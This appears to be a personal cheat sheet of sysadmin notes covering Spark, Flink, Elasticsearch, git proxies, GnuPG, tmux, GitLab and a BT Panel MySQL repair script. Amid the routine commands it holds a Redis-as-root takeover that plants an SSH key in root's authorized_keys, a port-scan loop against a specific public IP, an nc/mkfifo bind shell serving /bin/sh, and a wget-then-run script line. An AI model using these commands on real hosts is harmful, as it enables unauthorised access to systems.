Miscellaneous Notes

Useful Websites



Making an HTTP request by hand on Linux and watching it with tcpdump

```bash
tcpdump -nn -i eth0 port 80
curl www.baidu.com

exec 9<> /dev/tcp/www.baidu.com/80
echo -e "GET / HTTP/1.0\n" >& 9
cat <& 9
# List the open file descriptors, including the socket just created
ls /proc/$$/fd
```
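The `/dev/tcp` trick writes a raw HTTP/1.0 request into a TCP socket and reads back whatever the server sends until it closes the connection. A minimal Python sketch of the same exchange follows. The helper names `build_request` and `fetch` are made up for illustration, and unlike the shell version this sketch sends CRLF line endings and a `Host` header.

```python
import socket


def build_request(host: str, path: str = "/") -> bytes:
    """Build a bare HTTP/1.0 GET request (hypothetical helper)."""
    # Header lines end with CRLF; an empty line terminates the header block.
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def fetch(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the request over a plain TCP socket and return the raw response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # with HTTP/1.0 the server closes the socket when done
                break
            chunks.append(data)
    return b"".join(chunks)
```

Calling `fetch("www.baidu.com")` while the `tcpdump` capture is running should show the same handshake, request, and response packets as the shell version.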

Launching a project that uses embedded Jetty as its container

It serves HTTP requests and runs inside a Spark cluster.

```bash
$SPARK_HOME/bin/spark-submit \
  --master yarn-cluster \
  --name onlineAnalyse \
  --num-executors 30 \
  --driver-memory 20g \
  --executor-memory 50g \
  --executor-cores 90 \
  --driver-java-options "-Dlog4j.configuration=/root/emit-dep/conf/log4j.properties \
  -XX:+UseConcMarkSweepGC -XX:PermSize=1g -XX:MaxPermSize=1g -Xss10m -Xms30g -Xmx30g" \
  --conf spark.driver.port=20002 \
  --conf spark.default.parallelism=5500 \
  --conf spark.core.connection.ack.wait.timeout=300 \
  --conf spark.driver.maxResultSize=512m \
  --conf spark.kryoserializer.buffer.max=256m \
  --conf spark.kryoserializer.buffer=128m \
  --conf spark.memory.fraction=0.7 \
  --conf spark.driver.extraJavaOptions="-XX:MaxPermSize=10g -XX:+PrintGC -XX:+PrintGCDetails \
  -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:+PrintHeapAtGC \
  -XX:+PrintGCApplicationConcurrentTime -Xloggc:gc.log" \
  /root/emit-dep/combat-platform/target/combat-platform.jar
```



Flink SQL

```bash
yarn-session.sh -qu root.marketplus -jm 10g -nm FLINK_SESSION -s 4 -tm 20g -p 100 -d
cat /tmp/.yarn-properties-marketplus
sql-client.sh
```

Create the table:

```sql
CREATE or replace TABLE kt2 (
  `appkey` STRING,
  `model` STRING,
  `duid` STRING,
  `behavior` STRING,
  `req_time` TIMESTAMP(3) METADATA FROM 'timestamp'
) WITH (
  'connector' = 'kafka',
  'topic' = 'dsp_dev_2',
  'properties.bootstrap.servers' = '10.89.120.11:29092',
  'properties.group.id' = 'testGroup',
  'scan.startup.mode' = 'earliest-offset',
  'format' = 'json',
  'json.ignore-parse-errors' = 'true'
);
```

Send some data:

```json
{"appkey":"k1","model":"HUAWEIP50","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
{"appkey":"k1","model":"HUAWEIP50","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
{"appkey":"k2","model":"ONEPLUS-7Pro","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
```

Query:

```sql
SELECT
  count(1) as cnt
  ,appkey
  ,model
from kt2
where appkey <> '' and appkey is not null
group by appkey,model;
```
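To sanity-check what the query should return for the three sample messages, the grouping can be reproduced offline. This is only a sketch in plain Python, not Flink: `count_by_appkey_model` is a hypothetical helper that mimics the `WHERE` filter, the `GROUP BY appkey, model`, and the effect of `'json.ignore-parse-errors' = 'true'`.

```python
import json
from collections import Counter

# The three sample messages from the note, one JSON document per line.
SAMPLE = """\
{"appkey":"k1","model":"HUAWEIP50","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
{"appkey":"k1","model":"HUAWEIP50","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
{"appkey":"k2","model":"ONEPLUS-7Pro","duid":"d1","behavior":"consumer","req_time":"1636967439286"}
"""


def count_by_appkey_model(lines):
    """Count rows per (appkey, model), skipping bad JSON and empty appkeys."""
    counts = Counter()
    for line in lines:
        try:
            row = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records, like json.ignore-parse-errors
        if not isinstance(row, dict):
            continue
        appkey = row.get("appkey")
        if not appkey:  # WHERE appkey <> '' AND appkey IS NOT NULL
            continue
        counts[(appkey, row.get("model"))] += 1
    return dict(counts)


result = count_by_appkey_model(SAMPLE.splitlines())
print(result)
```

For the sample data this yields a count of 2 for (`k1`, `HUAWEIP50`) and 1 for (`k2`, `ONEPLUS-7Pro`), which is what the SQL client should converge to once all three messages have been consumed.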

Observe the window

Spark fails to create a Hive table

```
spark.conf.set("spark.sql.legacy.allowCreatingManagedTableUsingNonemptyLocation", "true")
```

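Optimal ratio of data to compute resources in a compute cluster

1 thread -> 1 GB of data

100 GB of data -> parallelism of 100

Parallelism of 100 -> 20 to 30 cores

Nearly 380 million records -> 3800 GB of data -> parallelism of 3800 -> 1280 cores -> 20 machines × 64 cores each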
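The rule of thumb can be turned into a small calculator. This is a rough sketch: the function name `size_cluster` and the default of 3 tasks per core are assumptions, chosen because the note's worked example (3800 tasks on 1280 cores) corresponds to about 3 tasks per core, while the "100 -> 20 to 30 cores" rule corresponds to roughly 3 to 5.

```python
import math


def size_cluster(data_gb, tasks_per_core=3.0, cores_per_machine=64):
    """Estimate parallelism, cores, and machines from the data volume.

    Assumes 1 GB of data per task, as in the note; tasks_per_core is an
    assumed tuning knob, not something the note states explicitly.
    """
    parallelism = math.ceil(data_gb)                 # 1 task per GB
    cores = math.ceil(parallelism / tasks_per_core)  # several tasks share a core
    machines = math.ceil(cores / cores_per_machine)
    return {
        "parallelism": parallelism,
        "cores": cores,
        "machines": machines,
        "total_cores": machines * cores_per_machine,
    }


print(size_cluster(3800))
```

With 3800 GB this gives a parallelism of 3800 and 20 machines of 64 cores (1280 cores in total), matching the last line of the note.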

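Transaction isolation levels

Dirty read

A transaction reads data that another transaction has written but not yet committed.

Non-repeatable read

Transaction A reads the same row twice within a single transaction and gets different data each time.

Phantom read

Transaction A reads a set of rows, transaction B inserts some rows, and when A reads again it finds that the number of rows has grown.

Within one transaction, rows newly added by other transactions become visible, as if a phantom had appeared. (Phantom reads resemble non-repeatable reads: a non-repeatable read sees the result of another transaction's update/delete, while a phantom read sees the result of another transaction's insert.)

Lost update

When two transactions select the same row and then update it, neither knows about the other, so an update gets lost. (You and I read the same row at the same time and modify it; you commit, then I commit, and my result overwrites yours.)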
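The lost-update interleaving is easy to reproduce in memory. The sketch below is a toy model, not a real database: `Row`, `blind_write`, and `checked_write` are hypothetical names, and the version check is an optimistic-locking technique added here for contrast rather than something taken from the note.

```python
class Row:
    """A single stored row with a version counter (toy model)."""

    def __init__(self, value):
        self.value = value
        self.version = 0


def blind_write(row, new_value):
    """Overwrite the row without checking whether it changed since the read."""
    row.value = new_value
    row.version += 1


def checked_write(row, new_value, version_read):
    """Write only if nobody has committed since version_read was observed."""
    if row.version != version_read:
        return False
    row.value = new_value
    row.version += 1
    return True


# Lost update: A and B both read 100, then each writes from its stale copy.
row = Row(100)
read_a = row.value
read_b = row.value
blind_write(row, read_a + 10)  # A commits 110
blind_write(row, read_b + 20)  # B commits 120 and silently discards A's +10
lost = row.value

# Same interleaving with a version check: B's stale write is rejected.
row2 = Row(100)
a_val, a_ver = row2.value, row2.version
b_val, b_ver = row2.value, row2.version
ok_a = checked_write(row2, a_val + 10, a_ver)
ok_b = checked_write(row2, b_val + 20, b_ver)
if not ok_b:
    # B re-reads the current state and retries.
    ok_b = checked_write(row2, row2.value + 20, row2.version)
fixed = row2.value

print(lost, fixed)
```

In the first run the final value is 120 instead of the expected 130; in the second run B's first attempt fails, and the retry produces 130.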

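Isolation levels

✔ means the anomaly can occur at that level; × means it cannot.

| Isolation level | Description | Dirty read | Non-repeatable read | Phantom read |
| --- | --- | --- | --- | --- |
| Read uncommitted | Lowest level | ✔ | ✔ | ✔ |
| Read committed | Statement level | × | ✔ | ✔ |
| Repeatable read | Transaction level | × | × | ✔ |
| Serializable | Highest level | × | × | × |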

Emacs

```
Quit Emacs
C-x C-c

Help (briefly describe a key)
C-h c

List buffers (to switch between them)
C-x C-b

Open a file in a new buffer
C-x C-f

Kill a buffer
C-x k

Save the current buffer
C-x C-s

Save all buffers
C-x s

Rename a buffer
M-x rename-buffer

Check the elpy configuration
M-x elpy-config

Show a variable's value
C-h v

Copy the selected text to the kill ring
M-w

Paste
C-y

Bind a key interactively
M-x global-set-key RET
```

Getting a Linux shell through a Redis instance started as root

```bash
echo -e "\n\n$(cat redisa.pub)\n\n" > foo.txt
cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
redis-cli -h 192.168.1.11 -p 6379 -a xxx
config set dir /root/.ssh/
config get dir
config get crackit
config set dbfilename "authorized_keys"
save
```

OpenWrt build sources and methods: link

Building Flink

```bash
mvn -pl '!:flink-end-to-end-tests-common-kafka' install -T 2C -Dfast -Dmaven.compile.fork=true -DskipTests -Dscala-2.11 -X -Drat.skip=true -Dmaven.javadoc.skip=true -Dcheckstyle.skip=true -Denforcer.skip=true
```

Passing extra startup options to ES

```bash
# Set the heap size
ES_JAVA_OPTS="-Xms60g -Xmx60g" ./bin/elasticsearch
```

Script for handling a large number of unassigned ES shards

```bash
#!/bin/bash
# For every index that has UNASSIGNED shards, reroute each such shard to the node named Master.
for index in $(curl -s 'http://localhost:9200/_cat/shards' | grep UNASSIGNED | awk '{print $1}' | sort | uniq); do
    for shard in $(curl -s 'http://localhost:9200/_cat/shards' | grep UNASSIGNED | grep "$index" | awk '{print $2}' | sort | uniq); do
        echo "$index" "$shard"
        # The index name is quoted so that the request body is valid JSON.
        curl -XPOST 'localhost:9200/_cluster/reroute' -d "{
            \"commands\" : [ {
                \"allocate\" : {
                    \"index\" : \"$index\",
                    \"shard\" : $shard,
                    \"node\" : \"Master\",
                    \"allow_primary\" : true
                }
            } ]
        }"
        sleep 5
    done
done
```
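The script's two steps, picking the unassigned (index, shard) pairs out of the `_cat/shards` listing and building one reroute body per pair, can be tried offline before touching a cluster. The sketch below is Python with hypothetical helper names (`unassigned_shards`, `reroute_body`). It assumes the default `_cat/shards` column order, where the state is the fourth column, and reuses the `allocate` command and the `Master` node name exactly as they appear in the script; whether a given Elasticsearch version still accepts that command is not checked here.

```python
import json


def unassigned_shards(cat_shards_text):
    """Return sorted, de-duplicated (index, shard) pairs whose state is UNASSIGNED."""
    pairs = set()
    for line in cat_shards_text.splitlines():
        fields = line.split()
        # Assumed columns: index shard prirep state ...
        if len(fields) >= 4 and fields[3] == "UNASSIGNED":
            pairs.add((fields[0], int(fields[1])))
    return sorted(pairs)


def reroute_body(index, shard, node="Master"):
    """Build the JSON body the script posts to /_cluster/reroute."""
    command = {
        "allocate": {
            "index": index,
            "shard": shard,
            "node": node,
            "allow_primary": True,
        }
    }
    return json.dumps({"commands": [command]})


# Made-up listing, for illustration only.
listing = """\
logs   0 p STARTED 10 1kb 10.0.0.1 Master
logs   1 p UNASSIGNED
logs   1 r UNASSIGNED
maclog 0 r UNASSIGNED
"""

for index, shard in unassigned_shards(listing):
    print(reroute_body(index, shard))
```

Building the body with `json.dumps` avoids the quoting problems that come with assembling JSON inside a shell string.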

Go cross-compilation

```bat
SET CGO_ENABLED=0
SET GOOS=linux
SET GOARCH=amd64
go build main.go
```

Deleting files under a directory with find

```bash
cd /opt/dir && find . -path "dir" -prune -false -o -print0|xargs -0 rm -fR
```

Adding a proxy to git

```bash
git config --global http.proxy socks5://127.0.0.1:1080
git config --global https.proxy socks5://127.0.0.1:1080
```

Adding a proxy on Linux

```bash
export http_proxy='http://localhost:1081'
export https_proxy='http://localhost:1081'
export ftp_proxy='http://localhost:1081'
```

```bash
# Add a proxy
git config --global http.https://github.com.proxy socks5://127.0.0.1:1080
# Remove the proxy
git config --global --unset http.proxy
```

Proxy for git over SSH

linux

```
Host github.com
    ProxyCommand nc -X 5 -x 127.0.0.1:1080 %h %p
```

windows

```
Host github.com
    ProxyCommand connect -H 127.0.0.1:1080 %h %p
```

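GnuPG

```bash
gpg --list-keys
```

Revoking a certificate

```bash
# Generate the revocation certificate
gpg --gen-revoke [user ID] > revoke.asc
# Import the revocation certificate
gpg --import revoke.asc
# Send the public key
gpg --send-keys [user ID]
# Check the certificate status
gpg --keyserver hkp://subkeys.pgp.net [user ID]
```

Exporting a public key

```bash
gpg --armor --output public-key.txt --export [user ID]
```

Exporting a private key

```bash
gpg --armor --output private-key.txt --export-secret-keys [user ID]
```

Importing a public key

```bash
gpg --import public-key.txt
```

Importing a private key

```bash
gpg --allow-secret-key-import --import private-key.txt
```

Uploading a public key

```bash
gpg --send-keys [user ID] --keyserver hkp://subkeys.pgp.net
```

Generating a fingerprint

Use it to check whether a downloaded public key is genuine.

```bash
gpg --fingerprint [user ID]
```

Entering keys

Encrypting and decrypting

```bash
# Encrypt demo.txt
gpg --recipient [user ID] --output demo.en.txt --encrypt demo.txt
# Decrypt demo.en.txt
gpg --recipient [user ID] --decrypt demo.en.txt > demo.txt
```

Signing

```bash
# Create a binary signed file
gpg --sign demo.txt

# Create an ASCII signed file
gpg --clearsign demo.txt

# Create a detached binary signature file
gpg --detach-sign demo.txt

# Create a detached ASCII signature file
gpg --armor --detach-sign demo.txt
```

Signing and encrypting

```bash
# --local-user signs with the sender's private key, --recipient encrypts with the recipient's public key, --armor produces ASCII output, --sign requests a signature, and --encrypt encrypts the given source file.
gpg --local-user [sender ID] --recipient [recipient ID] --armor --sign --encrypt demo.txt
gpg -r [recipient ID] --armor --sign --encrypt demo.txt
```

Verifying a signature

```bash
gpg --verify demo.txt.asc demo.txt
```

Viewing private key IDs

```bash
gpg --list-secret-keys --keyid-format LONG
```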

Removing the proxy

```bash
git config --global --unset http.proxy
git config --global --unset https.proxy

# Remove it for GitHub only
git config --global --unset http.https://github.com.proxy
```

Packaging a Python program

```bash
pyinstaller -F -w -i gen.ico EasternHacker.py
```

-F, --onefile: produce a single file for deployment (see XXXXX).

ES data migration

```bash
esm -s http://localhost:9200 -d http://15.17.141.11:9200 -x maclog201912 -w=50 --bulk_size=100 -c 10000 --copy_settings --copy_mappings --force --refresh
```

tmux

```bash
tmux ls
tmux new -s
tmux attach -t
tmux kill-window -t

# Enable scrolling and paging
#set -g mode-mouse on
#set -g mouse-resize-pane on
#set -g mouse-select-pane on
#set -g mouse-select-window on
set-option -g history-limit 200000
set -g terminal-overrides 'xterm*:smcup@:rmcup@'
```

gitlab

```bash
# Commands to run after the server restarts
## Start D-BUS inside the Docker container
/opt/gitlab/embedded/bin/runsvdir-start &
## Start the ssh service
/usr/sbin/sshd -D

# Data migration
gitlab-rake db:migrate
gitlab-rake cache:clear
gitlab-ctl upgrade

# Log in with psql
psql -h /var/opt/gitlab/postgresql -d gitlabhq_production
```

BT Panel (宝塔) database repair

```bash
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH

public_file=/www/server/panel/install/public.sh
if [ ! -f $public_file ];then
	wget -O $public_file http://download.bt.cn/install/public.sh -T 30;
fi
. $public_file

if [ -z "${NODE_URL}" ];then
	download_Url="http://download.bt.cn"
else
	download_Url=$NODE_URL
fi

Mysql_Check(){
	if [ ! -f "/www/server/mysql/bin/mysql" ]; then
		echo "BT Panel MySQL is not installed on this server!"
		exit;
	fi
	ps -ef |grep /www/server/mysql |grep -v grep > /dev/null
	if [ $? -ne 1 ]; then
		echo "mysql is running! exit;"
		exit;
	fi
}

# Disk check
Disk_Check(){
	DiskFree=`df -h | awk '/\// {print $5, $6 "DiskCheck"}' | awk '/\/wwwDiskCheck/ {print $1}'`
	DiskInodes=`df -i | awk '/\/www/ {print $5, $6 "diskTest"}' |awk '/\/wwwdiskTest/ {print $1}'`
	MysqlBinDisk=`du -s /www/server/data/mysql-bin.* | awk '{size = size + $1} END {print size}'`
	MysqlDataDisk=`df /www/server/data | awk 'NR==2 {printf ("%.0f", $2/10)}'`

	if [ "${DiskFree}" == "100%" ] && [ "${MysqlBinDisk}" -gt "${MysqlDataDisk}" ]; then
		read -p "The disk may be full because of MySQL logs. Clear the MySQL logs and try to start? (y/n):" clear
		if [ "${clear}" = "y" ]; then
			rm -f /www/server/data/mysql-bin.*
			rm -f /www/server/data/ib_*
			sleep 2
			/etc/init.d/mysqld start
			exit;
		fi
	fi

	if [ "${DiskFree}" == "100%" ]; then
		df -h
		echo -e "============================================================"
		echo -e "The disk is full, so MySQL cannot start"
		echo -e "You can run the following commands to free space and then start MySQL"
		echo -e "Empty the recycle bin->>\033[31mrm -rf /www/Recycle_bin/*\033[0m"
		echo -e "Clean system junk and site logs->>\033[31mpython /www/server/panel/tools.py clear\033[0m"
		echo -e "Start mysql->>\033[31m/etc/init.d/mysqld start\033[0m"
		exit;
	fi

	if [ "${DiskInodes}" == "100%" ]; then
		df -i
		echo -e "============================================================"
		echo -e "The disk's inodes are exhausted, so MySQL cannot start"
		echo -e "You can try the following commands to free them and then start MySQL"
		echo -e "Clean system junk and site logs->>\033[31mpython /www/server/panel/tools.py clear\033[0m"
		echo -e "Start mysql->>\033[31m/etc/init.d/mysqld start\033[0m"
		exit;
	fi
}

# Tune the config file to the machine's memory
MySQL_Opt()
{
	MemTotal=`free -m | grep Mem | awk '{print $2}'`
	if [[ ${MemTotal} -gt 1024 && ${MemTotal} -lt 2048 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 32M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 128#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 768K#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 768K#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 8M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 16#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 16M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 32M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 128M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 32M#" /etc/my.cnf
	elif [[ ${MemTotal} -ge 2048 && ${MemTotal} -lt 4096 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 64M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 256#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 1M#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 1M#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 16M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 32#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 32M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 64M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 256M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 64M#" /etc/my.cnf
	elif [[ ${MemTotal} -ge 4096 && ${MemTotal} -lt 8192 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 128M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 512#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 2M#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 2M#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 32M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 64#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 64M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 64M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 512M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 128M#" /etc/my.cnf
	elif [[ ${MemTotal} -ge 8192 && ${MemTotal} -lt 16384 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 256M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 1024#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 4M#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 4M#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 64M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 128#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 128M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 128M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 1024M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 256M#" /etc/my.cnf
	elif [[ ${MemTotal} -ge 16384 && ${MemTotal} -lt 32768 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 512M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 2048#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 8M#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 8M#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 128M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 256#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 256M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 256M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 2048M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 512M#" /etc/my.cnf
	elif [[ ${MemTotal} -ge 32768 ]]; then
		sed -i "s#^key_buffer_size.*#key_buffer_size = 1024M#" /etc/my.cnf
		sed -i "s#^table_open_cache.*#table_open_cache = 4096#" /etc/my.cnf
		sed -i "s#^sort_buffer_size.*#sort_buffer_size = 16M#" /etc/my.cnf
		sed -i "s#^read_buffer_size.*#read_buffer_size = 16M#" /etc/my.cnf
		sed -i "s#^myisam_sort_buffer_size.*#myisam_sort_buffer_size = 256M#" /etc/my.cnf
		sed -i "s#^thread_cache_size.*#thread_cache_size = 512#" /etc/my.cnf
		sed -i "s#^query_cache_size.*#query_cache_size = 512M#" /etc/my.cnf
		sed -i "s#^tmp_table_size.*#tmp_table_size = 512M#" /etc/my.cnf
		sed -i "s#^innodb_buffer_pool_size.*#innodb_buffer_pool_size = 4096M#" /etc/my.cnf
		sed -i "s#^innodb_log_file_size.*#innodb_log_file_size = 1024M#" /etc/my.cnf
	fi
}

# Repair the config file
My_Cnf(){
	Data_Path="/www/server/data"
	version=$(cat /www/server/mysql/version.pl|cut -c 1-3)
	if [ "${version}" == "5.1" ]; then
		defaultEngine="MyISAM"
	else
		defaultEngine="InnoDB"
	fi
	cat > /etc/my.cnf<<EOF
[client]
#password = your_password
port = 3306
socket = /tmp/mysql.sock

[mysqld]
port = 3306
socket = /tmp/mysql.sock
datadir = ${Data_Path}
default_storage_engine = ${defaultEngine}
skip-external-locking
key_buffer_size = 8M
max_allowed_packet = 100G
table_open_cache = 32
sort_buffer_size = 256K
net_buffer_length = 4K
read_buffer_size = 128K
read_rnd_buffer_size = 256K
myisam_sort_buffer_size = 4M
thread_cache_size = 4
query_cache_size = 4M
tmp_table_size = 8M
sql-mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES

#skip-name-resolve
max_connections = 500
max_connect_errors = 100
open_files_limit = 65535

log-bin=mysql-bin
binlog_format=mixed
server-id = 1
slow_query_log=1
slow-query-log-file=${Data_Path}/mysql-slow.log
long_query_time=3
#log_queries_not_using_indexes=on

innodb_data_home_dir = ${Data_Path}
innodb_data_file_path = ibdata1:10M:autoextend
innodb_log_group_home_dir = ${Data_Path}
innodb_buffer_pool_size = 16M
innodb_log_file_size = 5M
innodb_log_buffer_size = 8M
innodb_flush_log_at_trx_commit = 1
innodb_lock_wait_timeout = 50

[mysqldump]
quick
max_allowed_packet = 500M

[mysql]
no-auto-rehash

[myisamchk]
key_buffer_size = 20M
sort_buffer_size = 20M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
EOF

	if [ "${version}" == "8.0" ]; then
		sed -i '/server-id/a\binlog_expire_logs_seconds = 600000' /etc/my.cnf
		sed -i '/tmp_table_size/a\default_authentication_plugin = mysql_native_password' /etc/my.cnf
		sed -i '/default_authentication_plugin/a\lower_case_table_names = 1' /etc/my.cnf
		sed -i '/query_cache_size/d' /etc/my.cnf
	else
		sed -i '/server-id/a\expire_logs_days = 10' /etc/my.cnf
	fi

	if [ "${version}" != "5.5" ];then
		if [ "${version}" != "5.1" ]; then
			sed -i '/skip-external-locking/i\table_definition_cache = 400' /etc/my.cnf
			sed -i '/table_definition_cache/i\performance_schema_max_table_instances = 400' /etc/my.cnf
		fi
	fi

	if [ "${version}" != "5.1" ]; then
		sed -i '/innodb_lock_wait_timeout/a\innodb_max_dirty_pages_pct = 90' /etc/my.cnf
		sed -i '/innodb_max_dirty_pages_pct/a\innodb_read_io_threads = 4' /etc/my.cnf
		sed -i '/innodb_read_io_threads/a\innodb_write_io_threads = 4' /etc/my.cnf
	fi

	[ "${version}" == "5.1" ] || [ "${version}" == "5.5" ] && sed -i '/STRICT_TRANS_TABLES/d' /etc/my.cnf
	[ "${version}" == "5.7" ] || [ "${version}" == "8.0" ] && sed -i '/#log_queries_not_using_indexes/a\early-plugin-load = ""' /etc/my.cnf
	[ "${version}" == "5.6" ] || [ "${version}" == "5.7" ] || [ "${version}" == "8.0" ] && sed -i '/#skip-name-resolve/i\explicit_defaults_for_timestamp = true' /etc/my.cnf
}

# Set permissions
Set_permission()
{
	groupadd mysql
	useradd -s /sbin/nologin -M -g mysql mysql
	chown -R mysql:mysql /www/server/data
	chown -R mysql:mysql /www/server/mysql
	chmod 777 /tmp
}

# Move the binary logs out of the way
logs_clear(){
	if [ ! -d "/www/server/data/logBackup" ]; then
		mkdir -p /www/server/data/logBackup
		mv /www/server/data/mysql-bin.* /www/server/data/logBackup
		mv /www/server/data/ib_* /www/server/data/logBackup
	fi
}

Mysql_Init_Repair(){
	local mysqlVersion=$(cat /www/server/mysql/version.pl)
	local mariadbVersion=$(cat /www/server/mysql/version.pl|grep -oE 10.[0-9].[0-9]+|cut -c 1-4)
	local alisqlCheck=$(cat /www/server/mysql/version.pl|grep AliSQL)
	if [ "${mariadbVersion}" ];then
		wget -O /etc/init.d/mysqld ${download_Url}/init/mysql/init/mariadb${mariadbVersion}
	elif [ "${alisqlCheck}" ]; then
		wget -O /etc/init.d/mysqld ${download_Url}/init/mysql/init/alisql
	else
		mysqlV=${mysqlVersion:0:3}
		wget -O /etc/init.d/mysqld ${download_Url}/init/mysql/init/mysql${mysqlV}
	fi
	chmod +x /etc/init.d/mysqld
}

Mysql_Check
Disk_Check

Mysql_Init=$(cat /etc/init.d/mysqld)
if [ ! -f "/etc/init.d/mysqld" ] || [ -z "${Mysql_Init}" ];then
	Mysql_Init_Repair
fi

MyCnf=$(cat /etc/my.cnf)
btMyCnfCheck=$(cat /etc/my.cnf|grep default_storage_engine|grep -i myisam)
if [ ! -f "/etc/my.cnf" ]; then
	My_Cnf
elif [ -z "${MyCnf}" ];then
	mv /etc/my.cnf /etc/my.cnf.backup
	My_Cnf
fi

MySQL_Opt
/etc/init.d/mysqld stop
if [ -f "/tmp/mysql.sock" ]; then
	rm -f /tmp/mysql.sock
fi
Set_permission
logs_clear
/etc/init.d/mysqld start
sleep 3

ps -fe|grep mysql |grep -v grep
if [ $? -ne 0 ]; then
	echo "=========================================================================================="
	cat /www/server/data/*.err | grep ERROR
	echo "=========================================================================================="
	echo "mysql start error."
	echo "MySQL failed to start; post a screenshot of the errors above on the forum for help"
else
	echo "=========================================================================================="
	echo "mysql is running"
fi
rm -f sql-repair.sh
```

```bash
wget -O sql-repair.sh http://download.bt.cn/install/sql-repair.sh && sh sql-repair.sh
```

ArchLinux

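Migration

Commands

```bash
# Search for a package
pacman -Ss
# Install
pacman -S
# Uninstall
pacman -R
# Refresh the package databases
pacman -Sy
# Upgrade the system
pacman -Syu
# Force a full refresh and upgrade the system
pacman -Syyu
# Remove unused packages
pacman -Sc
# Query installed packages
pacman -Q
# Remove a package together with its dependencies
pacman -Rsn
```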

Scanning ports

```bash
for PORT in {20000..60000}
do
    timeout 1 bash -c "</dev/tcp/114.95.211.169/$PORT &>/dev/null" && echo "port $PORT is open" >> /root/test.log
done
```

Shell over nc (server side)

```bash
rm /tmp/f -f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc -lk 0.0.0.0 2000 > /tmp/f
```

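NAS expansion

Synology NAS: moving shared folders across storage volumes (after adding a disk to the NAS)

Synology NAS: moving packages (applications) across storage volumes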

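Some Lucene query syntax

Fields of numeric, date/time, IP, or string type can be queried over a range:

```
length:[100 TO 200]
sip:["172.16.1.100" TO "172.16.1.200"]
date:{"now-6h" TO "now"}
tag:{b TO e}
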